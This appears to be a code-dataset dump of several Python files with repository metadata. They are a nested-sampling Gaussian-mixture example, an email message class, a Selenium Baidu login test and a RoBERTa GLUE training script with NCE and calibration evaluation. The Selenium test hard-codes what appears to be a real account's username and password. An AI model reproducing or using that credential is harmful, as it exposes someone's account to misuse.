'Weights must sum to 1! Weights=' + str(weights))
self.nderived = nderived
self.weights = weights
self.sigmas = [sigma] * len(weights)
positions = []
positions.append(np.asarray([0, sep]))
positions.append(np.asarray([0, -sep]))
positions.append(np.asarray([sep, 0]))
positions.append(np.asarray([-sep, 0]))
self.positions = positions[:len(weights)]
def __call__(self, theta):
thetas = []
for pos in self.positions:
thetas.append(copy.deepcopy(theta))
thetas[-1][:2] -= pos
logls = [(Gaussian(sigma=self.sigmas[i])(thetas[i])[0]
+ np.log(self.weights[i])) for i in range(len(self.weights))]
logl = scipy.special.logsumexp(logls)
return logl, [0.0] * self.nderived
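# The mixture log-likelihood above is computed in a numerically stable way as
# log p(theta) = logsumexp_i(log w_i + log N(theta; mu_i, sigma_i^2 I)),
# where the component means mu_i only shift the first two dimensions of theta.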
def main(args):
from nnest import NestedSampler
g = GaussianMix()
def loglike(z):
return np.array([g(x)[0] for x in z])
def transform(x):
return 10. * x
volume_switch = 1.0 / (5 * args.num_slow)
sampler = NestedSampler(args.x_dim, loglike, transform=transform, log_dir=args.log_dir, num_live_points=args.num_live_points,
hidden_dim=args.hidden_dim, num_layers=args.num_layers, num_blocks=args.num_blocks, num_slow=args.num_slow,
use_gpu=args.use_gpu)
sampler.run(train_iters=args.train_iters, mcmc_steps=args.mcmc_steps, volume_switch=volume_switch, noise=args.noise)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--x_dim', type=int, default=5,
help="Dimensionality")
parser.add_argument('--train_iters', type=int, default=2000,
help="number of train iters")
parser.add_argument("--mcmc_steps", type=int, default=0)
parser.add_argument("--num_live_points", type=int, default=1000)
parser.add_argument('--switch', type=float, default=-1)
parser.add_argument('--hidden_dim', type=int, default=128)
parser.add_argument('--num_layers', type=int, default=2)
parser.add_argument('--batch_size', type=int, default=100)
parser.add_argument('-use_gpu', action='store_true')
parser.add_argument('--flow', type=str, default='nvp')
parser.add_argument('--num_blocks', type=int, default=5)
parser.add_argument('--noise', type=float, default=-1)
parser.add_argument('--run_num', type=str, default='')
parser.add_argument('--num_slow', type=int, default=2)
parser.add_argument('--log_dir', type=str, default='logs/mog4_fast')
args = parser.parse_args()
main(args)
| 34.654206 | 135 | 0.618932 | 1,399 | 0.377292 | 0 | 0 | 0 | 0 | 0 | 0 | 351 | 0.09466 |
9066a9157ffc22c0ce94777109f0d24999e2d0dd | 3,060 | py | Python | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 85 | 2020-10-03T22:11:55.000Z | 2022-03-25T12:49:44.000Z | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 13 | 2020-10-05T10:59:34.000Z | 2022-03-26T08:16:24.000Z | sendria/message.py | scottcove/sendria | 26e7581cc8d7673887ac8018d8d32ff4ad23cfbd | [
"MIT"
]
| 13 | 2020-10-15T13:32:40.000Z | 2022-03-28T01:46:58.000Z | __all__ = ['Message']
import uuid
from email.header import decode_header as _decode_header
from email.message import Message as EmailMessage
from email.utils import getaddresses
from typing import Union, List, Dict, Any
class Message:
__slots__ = (
'id',
'sender_envelope', 'sender_message',
'recipients_envelope', 'recipients_message_to',
'recipients_message_cc', 'recipients_message_bcc',
'subject',
'source',
'size', 'type', 'peer',
'parts',
'created_at',
)
@classmethod
def from_email(cls, email: EmailMessage) -> 'Message':
o = cls()
o.id = None
o.sender_envelope = cls.decode_header(email['X-MailFrom'])
o.sender_message = cls.decode_header(email['FROM'])
o.recipients_envelope = email['X-RcptTo']
o.recipients_message_to = cls.split_addresses(cls.decode_header(email['TO'])) if 'TO' in email else []
o.recipients_message_cc = cls.split_addresses(cls.decode_header(email['CC'])) if 'CC' in email else []
o.recipients_message_bcc = cls.split_addresses(cls.decode_header(email['BCC'])) if 'BCC' in email else []
o.subject = cls.decode_header(email['Subject'])
o.source = email.as_string()
o.size = len(o.source)
o.type = email.get_content_type()
o.peer = ':'.join([i.strip(" '()")for i in email['X-Peer'].split(',')])
o.parts = []
o.created_at = None
for part in cls.iter_message_parts(email):
cid = part.get('Content-Id') or str(uuid.uuid4())
if cid[0] == '<' and cid[-1] == '>':
cid = cid[1:-1]
o.parts.append({'cid': cid, 'part': part})
return o
def to_dict(self) -> Dict[str, Any]:
return {
k: getattr(self, k)
for k in self.__slots__
}
def __repr__(self) -> str:
r = []
for k in self.__slots__:
if k not in ('source', 'parts'):
r.append(f'{k}={getattr(self, k)}')
else:
r.append(f'{k}=...')
return f'<EmailMessage: {", ".join(r)}>'
@classmethod
def decode_header(cls, value: Union[str, bytes, None]) -> str:
if not value:
return ''
headers = []
for decoded, charset in _decode_header(value):
if isinstance(decoded, str):
headers.append(decoded.encode(charset or 'utf-8'))
else:
headers.append(decoded)
return (b''.join(headers)).decode()
@classmethod
def split_addresses(cls, value: str) -> List[str]:
return [('{0} <{1}>'.format(name, addr) if name else addr)
for name, addr in getaddresses([value])]
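# For example (illustrative input), split_addresses('Alice <a@example.com>, b@example.com')
# returns ['Alice <a@example.com>', 'b@example.com'].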
@classmethod
def iter_message_parts(cls, email: EmailMessage) -> EmailMessage:
if email.is_multipart():
for payload in email.get_payload():
for part in cls.iter_message_parts(payload):
yield part
else:
yield email
| 34.382022 | 113 | 0.56732 | 2,836 | 0.926797 | 276 | 0.090196 | 2,074 | 0.677778 | 0 | 0 | 418 | 0.136601 |
9066b9980c0b3869cc716e1c22a3fe141c968868 | 1,705 | py | Python | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| null | null | null | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| null | null | null | myApps/test_web.py | Rocket-hodgepodge/NewsWeb | 7835b6ae4e754eb96f3f0d5983b2421c9464fee3 | [
"BSD-3-Clause"
]
| 2 | 2018-07-04T01:43:36.000Z | 2018-07-04T06:12:47.000Z | from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
import unittest
class NewVisitorTest(unittest.TestCase):
def setUp(self):
self.timeout = 40
self.browser = webdriver.Chrome()
self.browser.set_page_load_timeout(self.timeout)
self.wait = WebDriverWait(self.browser, self.timeout)
def tearDown(self):
self.browser.quit()
def test_can_start_a_list_and_retrieve_it_later(self):
self.browser.get('https://www.baidu.com')
self.assertIn('百度', self.browser.title)
login_link = self.wait.until(
EC.element_to_be_clickable((By.LINK_TEXT, '登录')))
login_link.click()
login_link_2 = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__footerULoginBtn')))
login_link_2.click()
username_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__userName')))
username_input.clear()
username_input.send_keys('橙色烟月')
password_input = self.wait.until(
EC.presence_of_element_located((By.ID, 'TANGRAM__PSP_10__password')))
password_input.clear()
password_input.send_keys('1659636840sec')
login_submit_button = self.wait.until(
EC.element_to_be_clickable((By.ID, 'TANGRAM__PSP_10__submit')))
login_submit_button.click()
username_span = self.wait.until(
EC.presence_of_element_located((By.CSS_SELECTOR, '#s_username_top > span')))
self.assertEqual(username_span.text, 'PebbleApp')
# user_login_link = self.browser.find_element_by_id('TANGRAM__PSP_10__footerULoginBtn')
# user_login_link.click()
if __name__ == '__main__':
unittest.main(warnings='ignore')
| 31.574074 | 89 | 0.775367 | 1,444 | 0.839047 | 0 | 0 | 0 | 0 | 0 | 0 | 346 | 0.201046 |
9067bc1c116c9890747e5871781d17c6c8744561 | 30,017 | py | Python | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
| 7 | 2021-04-22T09:56:54.000Z | 2022-03-20T14:44:02.000Z | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
| 1 | 2022-02-22T04:41:44.000Z | 2022-02-22T18:21:23.000Z | nce_glue/run_glue.py | salesforce/ebm_calibration_nlu | e0598923551c4587e0ea8c4feb001cb9cc736103 | [
"BSD-3-Clause"
]
| 1 | 2021-06-21T09:06:24.000Z | 2021-06-21T09:06:24.000Z | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
# Copyright (c) 2018, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Finetuning the library models for sequence classification on GLUE (Bert, XLM, XLNet, RoBERTa, Albert, XLM-RoBERTa)."""
import dataclasses
import logging
import os, math
import sys, copy
from dataclasses import dataclass, field
from typing import Callable, Dict, Optional
import numpy as np
import torch
from transformers import AutoConfig, AutoModelForSequenceClassification, AutoTokenizer, EvalPrediction, GlueDataset
from transformers import BertModel, BertConfig
from transformers import GlueDataTrainingArguments as DataTrainingArguments
from transformers import (
HfArgumentParser,
TrainingArguments,
glue_compute_metrics,
glue_output_modes,
glue_tasks_num_labels,
set_seed,
)
from my_robustness import MyRandomTokenNoise
from my_trainer import MyTrainer
from my_glue_dataset import MyGlueDataset
from my_modeling_roberta import MyRobertaForSequenceClassification, MyRobertaForNCESequenceClassification
from transformers.data.processors.utils import InputFeatures, InputExample
#import matplotlib
#matplotlib.use('Agg')
#import matplotlib.pyplot as plt
from my_utils import setLogger
#import checklist_utils
logger = logging.getLogger()
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune from.
"""
model_name_or_path: str = field(
metadata={"help": "Path to pretrained model or model identifier from huggingface.co/models"}
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None, metadata={"help": "Where do you want to store the pretrained models downloaded from s3"}
)
@dataclass
class CustomArguments:
do_eval_calibration: bool = field(default=False, metadata={"help": "Whether to print calibration."})
do_eval_scaling_binning_calibration: bool = field(default = False)
do_eval_noise_robustness: bool = field(default = False)
do_eval_checklist: bool = field(default = False)
do_energy_analysis: bool = field(default = False)
train_from_scratch: bool = field(default=False, metadata={"help": "Train from scratch."})
layer_num: int = field(default=2, metadata={"help": "The hidden layer number"})
eval_steps: int = field(default = -1, metadata = {"help": "evaluate steps"})
#my_learning_rate: float = field(default=2e-5) #just use the existing learning_rate
my_random_noise_rate: float = field(default=0)
fast_debug: int = field(default = 0)
nce_noise_file: str = field(default=None)
nce_noise_eval_file: str = field(default=None)
nce_noise_ratio: int = field(default = 1)
nce_lambda: float = field(default = 1)
noiselm_mode: str = field(default='normal')
nce_noise_batch_size: int = field(default = 32, metadata={'help':'nce_noise_batch'})
train_mode: str = field(default='normal') #or nce_noise
nce_mode: str = field(default='normal') #or normal or hidden or labeled or selflabeled
pcal_num_updates: int = field(default=10)
pcal_bin_size: int = field(default=20)
pcalloss_start_epochs: int = field(default=0)
pcal_train: bool = field(default=False)
pcalloss_lambda: float = field(default=1)
pcalloss_type: str = field(default='KL')
def main():
# See all possible arguments in src/transformers/training_args.py
# or by passing the --help flag to this script.
# We now keep distinct sets of args, for a cleaner separation of concerns.
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, TrainingArguments, CustomArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args, my_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args, my_args = parser.parse_args_into_dataclasses()
all_args = (model_args, data_args, training_args, my_args)
#training_args.learning_rate = my_args.my_learning_rate
if (
os.path.exists(training_args.output_dir)
and os.listdir(training_args.output_dir)
and training_args.do_train
and not training_args.overwrite_output_dir
):
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. Use --overwrite_output_dir to overcome."
)
# Setup logging
logging.basicConfig(
format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",
datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,
)
log_fn = training_args.output_dir + '/log_' + ('train_' if training_args.do_train else '') + ('eval_' if training_args.do_eval else '') + ('evalcalibration_' if my_args.do_eval_calibration else '') + '.txt'
print('logger file will be set to', log_fn)
os.system('mkdir -p ' + training_args.output_dir)
setLogger(logger, log_fn)
my_args.log_fn = log_fn
for kk in range(5): logger.info('==hostname %s', os.uname()[1])
logger.warning(
"Process rank: %s, device: %s, n_gpu: %s, distributed training: %s, 16-bits training: %s",
training_args.local_rank,
training_args.device,
training_args.n_gpu,
bool(training_args.local_rank != -1),
training_args.fp16,
)
logger.info("Training/evaluation parameters %s", training_args)
# Set seed
set_seed(training_args.seed)
try:
num_labels = glue_tasks_num_labels[data_args.task_name]
output_mode = glue_output_modes[data_args.task_name]
except KeyError:
raise ValueError("Task not found: %s" % (data_args.task_name))
# Load pretrained model and tokenizer
#
# Distributed training:
# The .from_pretrained methods guarantee that only one local process can concurrently
# download model & vocab.
config = AutoConfig.from_pretrained(
model_args.config_name if model_args.config_name else model_args.model_name_or_path,
num_labels=num_labels,
finetuning_task=data_args.task_name,
cache_dir=model_args.cache_dir,
)
tokenizer = AutoTokenizer.from_pretrained(
model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'normal':
assert('roberta' in model_args.model_name_or_path.lower())
#model = AutoModelForSequenceClassification.from_pretrained(
model = MyRobertaForSequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_mode == 'nce_noise':
#nce_model = MyRobertaForSequenceClassification(config)
assert('roberta' in model_args.model_name_or_path.lower())
model = MyRobertaForNCESequenceClassification.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
)
if my_args.train_from_scratch:
        print('=== training from scratch! reinitialize weights')
embed_bak = copy.deepcopy(model.bert.embeddings)
layer_bak = copy.deepcopy(model.bert.encoder.layer)
model.init_weights()
LL = my_args.layer_num
print('=== applying layer_num', LL)
# Initializing a BERT bert-base-uncased style configuration
new_config = BertConfig(num_hidden_layers=LL)
# Initializing a model from the bert-base-uncased style configuration
new_bert = BertModel(new_config)
print('=== using pretrained embedding')
new_bert.embeddings = embed_bak
"""
for l in range(LL):
print('copying encoder layer', l)
new_bert.encoder.layer[l] = layer_bak[l]
"""
model.bert = new_bert
model.config.num_hidden_layers = LL
nce_noise_train_dataset, nce_noise_eval_dataset = None, None
if my_args.train_mode == 'nce_noise' and training_args.do_train:
# Get datasets
nce_noise_train_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_file, mode = 'train', for_noiselm = False, my_args = my_args))
nce_noise_eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, special_mode = 'nce_noise', nce_noise_file = my_args.nce_noise_eval_file, mode = 'dev', for_noiselm = False, my_args = my_args))
# Get datasets
train_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, cache_dir=model_args.cache_dir, my_args = my_args)
)
eval_dataset = (MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, my_args = my_args))
test_dataset = (
MyGlueDataset(data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir, my_args = my_args)
if training_args.do_predict
else None
)
def build_compute_metrics_fn(task_name: str) -> Callable[[EvalPrediction], Dict]:
def compute_metrics_fn(p: EvalPrediction):
if output_mode == "classification":
preds = np.argmax(p.predictions, axis=1)
elif output_mode == "regression":
preds = np.squeeze(p.predictions)
return glue_compute_metrics(task_name, preds, p.label_ids)
return compute_metrics_fn
logger.info('constructing datasets (splitting eval_dataset) for calibration...')
dataset_cal_dev1 = copy.deepcopy(eval_dataset)
dataset_cal_dev2 = copy.deepcopy(eval_dataset)
dataset_cal_tr = copy.deepcopy(train_dataset)
cal_num = int(len(eval_dataset) / 2)
dataset_cal_dev1.features = dataset_cal_dev1.features[:cal_num]
dataset_cal_dev2.features = dataset_cal_dev2.features[-cal_num:]
#dataset_cal_tr.features = dataset_cal_tr.features[-cal_num:]
logger.info('setting eval_dataset to dataset_cal_dev2...')
eval_dataset = dataset_cal_dev2
# Initialize our Trainer
trainer = MyTrainer(
model=model,
args=training_args,
train_dataset=train_dataset,
eval_dataset=eval_dataset,
compute_metrics=build_compute_metrics_fn(data_args.task_name),
tokenizer = tokenizer,
my_args = my_args,
)
print('=== random_noise_rate:', my_args.my_random_noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, my_args.my_random_noise_rate)
input_transform = None
if my_args.my_random_noise_rate > 0:
input_transform = my_noise.add_random_noise
# Training
final_evalres_savefn = None
if training_args.do_train:
#if my_args.train_mode == 'nce_noise':
# trainer.nce_train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform)
#else:
set_seed(training_args.seed) #set seed again before constructing suite, so that it will be the same thing when do_eval
suite = None
#suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
return_d = {}
trainer.train(model_path=model_args.model_name_or_path if os.path.isdir(model_args.model_name_or_path) else None, input_transform = input_transform, train_mode = my_args.train_mode, nce_noise_dataset = nce_noise_train_dataset, nce_noise_ratio = my_args.nce_noise_ratio, nce_noise_bz = my_args.nce_noise_batch_size, nce_mode = my_args.nce_mode, nce_noise_eval_dataset = nce_noise_eval_dataset, return_d = return_d, checklist_suite = suite, all_args = all_args)
trainer.save_model()
# For convenience, we also re-save the tokenizer to the same directory,
# so that you can share your model easily on huggingface.co/models =)
if trainer.is_world_master():
tokenizer.save_pretrained(training_args.output_dir)
logger.info('===PRINTING EVAL_RES_LIS===')
for eval_res in return_d['eval_res_lis']:
logger.info(str(eval_res))
final_evalres_savefn = training_args.output_dir + '/eval_res_save/final_eval_res.save'
torch.save(return_d['eval_res_lis'], final_evalres_savefn)
logger.info('eval res saved to %s', final_evalres_savefn)
final_eval_results, final_checklist_eval_results = {}, {}
final_nce_eval_results, final_nce_train_results = {}, {}
# evaluation
eval_results = {}
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
logger.info('===SWITCHING to mnli-mm for test')
eval_dataset = GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
"""
logger.info('seed: %d', training_args.seed)
if training_args.do_eval:
logger.info("*** evaluate ***")
set_seed(training_args.seed) #set seed again before eval
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
#""" #we only look at the matched dev-set for mnli (mm is mismatched)
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
if my_args.train_mode == 'nce_noise':
eval_nce_result = trainer.nce_evaluate(nce_noise_eval_dataset)
final_nce_eval_results.update(eval_nce_result)
train_nce_result = trainer.nce_evaluate(nce_noise_train_dataset, max_step = 500)
final_nce_train_results.update(train_nce_result)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
eval_results.update(eval_result)
#final_eval_results['eval_acc'] = eval_result['eval_acc']
final_eval_results.update(eval_result)
if my_args.do_eval_checklist:
logger.info('*** eval checklist***')
set_seed(training_args.seed) #set seed again before eval
suite = checklist_utils.construct_checklist_suite(model, tokenizer, eval_dataset, all_args)
cres = checklist_utils.run_checklist_suite(model, tokenizer, eval_dataset, all_args, given_suite = suite, verbose = True)
final_checklist_eval_results.update(cres)
"""
if data_args.task_name.lower() == 'qqp':
cres = checklist_utils.do_checklist_QQP(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'qnli':
cres = checklist_utils.do_checklist_QNLI(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
if data_args.task_name.lower() == 'sst-2':
cres = checklist_utils.do_checklist_SST2(model, tokenizer, eval_dataset, all_args)
final_checklist_eval_results.update(cres)
"""
"""
for checklist_trans in ['typo', 'typo^2']:
eval_checklist_dataset = MyGlueDataset(data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir, checklist_transform = checklist_trans, my_args = my_args)
eval_result = trainer.evaluate(eval_dataset=eval_checklist_dataset, input_transform = None)
for s in eval_result:
final_checklist_eval_results['checklist_{}_{}'.format(checklist_trans, s)] = eval_result[s]
"""
if my_args.do_eval_noise_robustness:
# loop to handle mnli double evaluation (matched, mis-matched)
eval_datasets = [eval_dataset]
set_seed(training_args.seed) #set seed again before eval
"""
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
eval_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="dev", cache_dir=model_args.cache_dir)
)
""" #we only look at the matched dev-set for mnli (mm is mismatched)
for noise_rate in [0.1, 0.2]:
logger.info('*** eval_noise_robustness rate: %f ***', noise_rate)
my_noise = MyRandomTokenNoise(tokenizer, noise_rate)
input_transform = my_noise.add_random_noise
assert(len(eval_datasets) == 1)
for eval_dataset in eval_datasets:
trainer.compute_metrics = build_compute_metrics_fn(eval_dataset.args.task_name)
#prediction_output = trainer.predict(test_dataset=eval_dataset)
eval_result = trainer.evaluate(eval_dataset=eval_dataset, input_transform = input_transform)
output_eval_file = os.path.join(
training_args.output_dir, f"eval_results_{eval_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_eval_file, "w") as writer:
logger.info("***** eval results {} *****".format(eval_dataset.args.task_name))
for key, value in eval_result.items():
logger.info(" %s = %s", key, value)
writer.write("%s = %s\n" % (key, value))
if 'eval_mnli/acc' in eval_result: eval_result['eval_acc'] = eval_result['eval_mnli/acc']
final_eval_results['randomnoise{}_eval_acc'.format(noise_rate)] = eval_result['eval_acc']
import calibration as cal
from my_calibration import TScalCalibrator
def do_cal(trainer, eval_d, do_postcal = False, do_plattbin = True, do_tscal = True, tr_d = None, ss = ''):
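        # Report accuracy and ECE of the trainer's predictions on eval_d. When
        # do_postcal is True, first fit a post-hoc calibrator (Platt-binning
        # and/or temperature scaling) on predictions for tr_d and report the
        # recalibrated metrics instead; `ss` prefixes the returned metric keys.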
prediction_output = trainer.predict(test_dataset=eval_d)
probs_eval, labels_eval = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
if do_postcal == False:
ece = cal.get_ece(probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
res = {}
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = prediction_output.predictions, label_ids = prediction_output.label_ids))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'acc': acc, ss + 'ece': ece})
logger.info('cal_res: %s', str(res))
return res
prediction_output = trainer.predict(test_dataset=tr_d)
probs_tr, labels_tr = torch.softmax(torch.FloatTensor(prediction_output.predictions), dim = -1), torch.LongTensor(prediction_output.label_ids)
res = {}
if do_plattbin == True:
calibrator = cal.PlattBinnerMarginalCalibrator(len(probs_tr), num_bins=20)
calibrator.train_calibration(probs_tr.numpy(), labels_tr.numpy())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.numpy()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'plattbin_acc': acc, ss + 'plattbin_ece': ece})
if do_tscal == True:
calibrator = TScalCalibrator(num_bins=20)
calibrator.train_calibration(probs_tr.cpu(), labels_tr.cpu())
calibrated_probs_eval = torch.FloatTensor(calibrator.calibrate(probs_eval.cpu()))
ece = cal.get_ece(calibrated_probs_eval.numpy(), labels_eval.numpy(), num_bins = 20)
acc = torch.sum(torch.argmax(calibrated_probs_eval, dim = -1) == labels_eval).item() * 1.0 / labels_eval.size(0)
if data_args.task_name.lower() == 'cola':
mcc_res = trainer.compute_metrics(EvalPrediction(predictions = torch.log(calibrated_probs_eval).numpy(), label_ids = labels_eval.numpy()))
res[ss + 'mcc'] = mcc_res['mcc']
res.update({ss + 'tscal_acc': acc, ss + 'tscal_ece': ece})
logger.info('cal_res: %s', str(res))
return res
if my_args.do_eval_calibration:
logger.info("*** do calbiration ***")
#if data_args.task_name.lower() == 'cola':
#it's cola, let's do evaluate for mcc
#res = trainer.evaluate(eval_dataset = dataset_cal_dev2)
set_seed(training_args.seed) #set seed again before eval
drawcal_res = trainer.eval_calibration(dataset_cal_dev2, verbose = True, fig_fn = training_args.output_dir + '/{}_calibration.pdf'.format(data_args.task_name))
save_fn = training_args.output_dir + '/drawcal.save'
logger.info('saving drawcal_res to %s', save_fn)
torch.save(drawcal_res, save_fn)
cal_res = do_cal(trainer, dataset_cal_dev2, do_postcal = False, ss = 'cal_ori_')
final_eval_results.update(cal_res)
if my_args.do_eval_scaling_binning_calibration:
logger.info('*** do scaling_binning calibration ***')
set_seed(training_args.seed)
cal_res = {}
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_dev1, ss = 'cal_dev_'))
cal_res.update(do_cal(trainer, dataset_cal_dev2, do_postcal = True, do_plattbin = False, do_tscal = True, tr_d = dataset_cal_tr, ss = 'cal_train_'))
logger.info('===scaling_binning_calibration %s', str(cal_res))
final_eval_results.update(cal_res)
if training_args.do_predict:
logging.info("*** Test ***")
test_datasets = [test_dataset]
if data_args.task_name == "mnli":
mnli_mm_data_args = dataclasses.replace(data_args, task_name="mnli-mm")
test_datasets.append(
GlueDataset(mnli_mm_data_args, tokenizer=tokenizer, mode="test", cache_dir=model_args.cache_dir)
)
for test_dataset in test_datasets:
predictions = trainer.predict(test_dataset=test_dataset).predictions
if output_mode == "classification":
predictions = np.argmax(predictions, axis=1)
output_test_file = os.path.join(
training_args.output_dir, f"test_results_{test_dataset.args.task_name}.txt"
)
if trainer.is_world_master():
with open(output_test_file, "w") as writer:
logger.info("***** Test results {} *****".format(test_dataset.args.task_name))
writer.write("index\tprediction\n")
for index, item in enumerate(predictions):
if output_mode == "regression":
writer.write("%d\t%3.3f\n" % (index, item))
else:
item = test_dataset.get_labels()[item]
writer.write("%d\t%s\n" % (index, item))
if my_args.do_energy_analysis:
logger.info('*** do_energy_analysis ***')
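        # Compare the NCE energy scores of the current model against the output
        # probabilities of a hard-coded baseline checkpoint on the dev2 split,
        # save both to disk, and print the lowest/highest-energy examples.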
eval_dataloader = trainer.get_eval_dataloader(dataset_cal_dev2)
logger.info('loading baseline model...')
if data_args.task_name.lower() == 'sst-2':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/SST-2/LR2e-5BA32MAXSTEP5233WARMSTEP314/')
if data_args.task_name.lower() == 'qnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/QNLI/LR2e-5BA32MAXSTEP8278WARMSTEP496')
if data_args.task_name.lower() == 'mrpc':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MRPC/LR1e-5BA16MAXSTEP2296WARMSTEP137')
if data_args.task_name.lower() == 'mnli':
base_model = MyRobertaForSequenceClassification.from_pretrained('./exps/glue_baseline_roberta-base/MNLI/LR2e-5BA32MAXSTEP30968WARMSTEP1858/')
base_model = base_model.cuda()
lis_energy, lis_logits, lis_logits_base = [], [], []
for step, inputs in enumerate(eval_dataloader):
has_labels = any(inputs.get(k) is not None for k in ["labels", "lm_labels", "masked_lm_labels"])
for k, v in inputs.items():
inputs[k] = v.cuda()
return_d = {}
model.eval(); base_model.eval();
with torch.no_grad():
outputs = base_model(**inputs)
lis_logits_base.append(outputs[1])
inputs['special_mode'] = 'nce_noise'
inputs['nce_mode'] = my_args.nce_mode
inputs['return_d'] = return_d
inputs['nce_feed_type'] = 'data'
inputs['nce_noise_ratio'] = my_args.nce_noise_ratio
outputs = model(**inputs)
lis_energy.append(return_d['nce_logits'])
lis_logits.append(outputs[1])
all_energy = torch.cat(lis_energy, dim = 0).view(-1)
all_probs = torch.softmax(torch.cat(lis_logits, dim = 0), dim = -1)
